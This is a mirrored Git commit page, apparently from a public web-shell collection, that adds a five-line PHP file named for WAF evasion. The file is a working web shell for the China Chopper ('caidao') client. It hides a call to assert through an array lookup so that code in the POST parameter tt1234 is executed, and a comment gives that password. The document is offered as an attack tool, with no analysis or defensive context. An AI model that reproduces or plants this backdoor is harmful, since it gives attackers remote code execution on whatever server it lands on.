mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
add php webshell for caidao
This commit is contained in:
parent
5fc033c147
commit
c80515aa38
1 changed files with 5 additions and 0 deletions
5
php/pass-waf-2014-10-19.php
Normal file
5
php/pass-waf-2014-10-19.php
Normal file
|
@ -0,0 +1,5 @@
|
||||||
|
<?php
|
||||||
|
$item['tt'] = 'assert';
|
||||||
|
$array[] = $item;
|
||||||
|
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
|
||||||
|
?>
|
Loading…
Reference in a new issue